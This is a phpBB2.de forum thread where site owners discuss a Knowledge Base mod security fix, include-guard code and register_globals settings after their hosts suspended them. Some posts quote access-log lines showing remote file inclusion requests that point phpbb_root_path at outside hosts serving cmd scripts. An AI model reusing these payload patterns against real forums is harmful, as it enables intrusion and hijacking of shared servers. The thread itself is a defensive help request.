| Autor |
Nachricht |
Blisk
phpBB2.de User
Anmeldungsdatum: 27.11.2003
Beiträge: 994
Wohnort: sLOVEnia
|
 Verfasst am:
Di 30 Mai, 2006 15:03 |
   |
this is for all files in folder /includes
What about other files like /admin folder?
and all others? |
|
|
    |
|
Google
|
| Verfasst am:
|
|
|
|
|
Speedy
phpBB2.de User
Anmeldungsdatum: 07.09.2002
Beiträge: 283
Wohnort: Mexico :)
|
| Verfasst am:
Mo 05 Jun, 2006 12:00 |
|
Sehe ich das richtig, wenn ich Plus 1.52 hab, muss ich das Update nicht machen ?
Ich finde die Datei außerdem nicht im Includes Ordner  |
_________________
..:: Sat-Bay.de ::..
Wir haben fast alles |
|
|
|
Titus
Administrator
Anmeldungsdatum: 24.03.2004
Beiträge: 4255
|
| Verfasst am:
Mo 05 Jun, 2006 12:09 |
|
wenn du die KB nicht selbst installiert hast brauchst du es nicht zu machen |
_________________
"geht nicht" ist keine Fehlerbeschreibung mit der man was anfangen kann
bei Fragen erst suchen
Downloads gibts hier und da |
|
 |
|
Alena
phpBB2.de User
Anmeldungsdatum: 05.09.2005
Beiträge: 26
|
| Verfasst am:
Mo 27 Nov, 2006 16:44 |
 |
Is it normal? (file attach_rules.php)
| PHP: |
<?php ***************************************************************************/
if ( defined('IN_PHPBB') )
{
die('Hacking attempt');
exit;
}
define('IN_PHPBB', TRUE);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
|
As I understand 'Hacking attempt' should appear only if " define('IN_PHPBB', TRUE) " is absent?
And: what for we use " exit; "?
======================================
I'm also wondering about files: phpbb2/kb.php and phpbb2/kb_search.php |
Zuletzt bearbeitet von Alena am Mo 27 Nov, 2006 16:56, insgesamt 2-mal bearbeitet |
|
|
|
coolsoft
phpBB2.de User
Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)
|
| Verfasst am:
Mo 27 Nov, 2006 16:50 |
|
|
|
|
cback
phpBB2.de User
[KB] Manager
Anmeldungsdatum: 16.01.2004
Beiträge: 3321
Wohnort: Saarland
|
| Verfasst am:
Di 28 Nov, 2006 09:49 |
|
| Alena hat folgendes geschrieben: |
Is it normal? (file attach_rules.php)
| PHP: |
<?php ***************************************************************************/
if ( defined('IN_PHPBB') )
{
die('Hacking attempt');
exit;
}
define('IN_PHPBB', TRUE);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
|
As I understand 'Hacking attempt' should appear only if " define('IN_PHPBB', TRUE) " is absent?
And: what for we use " exit; "?
======================================
I'm also wondering about files: phpbb2/kb.php and phpbb2/kb_search.php |
Its normal in this file. It has to be executed "alone" and not inside another phpBB Script. So the Script checks if its already defined, if not the first step is again to define it. |
_________________
[ Forensoftware | CBACK Software | SYNTACTION ]
Support only in Forum! - Support nur im Forum! |
|
 |
|
Alena
phpBB2.de User
Anmeldungsdatum: 05.09.2005
Beiträge: 26
|
| Verfasst am:
Di 28 Nov, 2006 20:44 |
|
My site was blocked by hoster because it eat too many recourses, the reason was in this request:
| Zitat: |
| my.site.acc_log:210.166.209.167 my.site - [26/Nov/2006:07:28:52 +0300] "GET /includes/functions_kb.php?phpbb_root_path=http://argento-bali.com/cmd.do?? HTTP/1.1" 200 5 "-" "libwww-perl/5.65" |
I read this subject and add
| PHP: |
<?php if ( !defined('IN_PHPBB') )
{
die("Hacking attempt"
}
|
in the beginning of listed files
auth.php
kb_constants.php
emailer.php
functions.php
funktions_admin.php
funktions_bookmark.php
funktions_jr_admin.php
funktions_kb.php
funktions_mods_settings.php
funktions_module.php
funktions_profile_fields.php
funktions_search.php
funktions_selects.php
funktions_stats.php
funktions_validate.php
sessions.php
smtp.php
sql_parse.php
template.php
topic_rewiev.php
usercp_avatar.php
and alse add
| Zitat: |
php_flag register_globals off
php_flag allow_url_fopen off |
in .htaccess file.
But today my hoster stop site again and the reason is:
| Zitat: |
| 217.112.37.50 my.site - [28/Nov/2006:15:03:26 +0300] \"GET /includes/functions.php?phpbb_root_path=http://www.bcbud.us/site/images/cmd.txt? HTTP/1.1\" 200 27 \"-\" \"libwww-perl/5.79\" |
What alse can I do?
Yes, and the begining of file functions.php:
| PHP: |
<?php <?php
/***************************************************************************
* functions.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: functions.php,v 1.133.2.31 2003/07/20 13:14:27 acydburn Exp $
*
*
***************************************************************************/
/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt" A
}
define('STYLE_URL', 's');
//-- mod : post icon -------------------------------------------------------------------------------
//-- add
function get_icon_title($icon, $empty=0, $topic_type=-1, $admin=false)
{
global $lang, $images, $phpEx, $phpbb_root_path;
// get icons parameters
include($phpbb_root_path . './includes/def_icons.' . $phpEx);
// admin path
$admin_path = ($admin) ? '../' : './';
// alignment
switch ($empty)
{
case 1:
$align= 'middle';
break;
case 2:
$align= 'bottom';
break;
default:
$align = 'absbottom';
break;
}
............................
|
|
|
|
|
|
coolsoft
phpBB2.de User
Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)
|
| Verfasst am:
Di 28 Nov, 2006 20:54 |
|
|
|
|
Alena
phpBB2.de User
Anmeldungsdatum: 05.09.2005
Beiträge: 26
|
| Verfasst am:
Di 28 Nov, 2006 21:06 |
|
Do you think it is the fault of hoster? I don’t know…  
May be: hoster with special characteristics (what characteristics I need?)?
Any way: it help only until moment when some bad guy will use this hole in security.  |
|
|
|
|
KoraS
phpBB2.de User
Anmeldungsdatum: 06.11.2006
Beiträge: 19
|
| Verfasst am:
Sa 29 Sep, 2007 19:56 |
|
| Alena hat folgendes geschrieben: |
My site was blocked by hoster because it eat too many recourses, the reason was in this request:
| error message hat folgendes geschrieben: |
| my.site.acc_log:210.166.209.167 my.site - [26/Nov/2006:07:28:52 +0300] "GET /includes/functions_kb.php?phpbb_root_path=http://argento-bali.com/cmd.do?? HTTP/1.1" 200 5 "-" "libwww-perl/5.65" |
.... |
I had the same problem added the code as above, but am now a bit reluctant to reopen my forum, the message my hoster sent me was the following:
| my hoster hat folgendes geschrieben: |
Hackers keep getting into your account and are running scripts that use all the servers CPU.
This generates complaints from other users on your shared server.
You have two forums and neither are "disabled" as far as a hacker being able to get it.
..... |
best would be if there is a hacker, who could check the forums out, and then we as owner would be able to add something like hacker secure image or similar...
check this out, looks interesting, will have a closer look when i have more time:
http://phpsec.org/ |
|
|
|
|
|
|
|
|
![[netclusive - internet broadcasting]](templates/fisubsilversh/images/phpbb2_logor_01.gif)
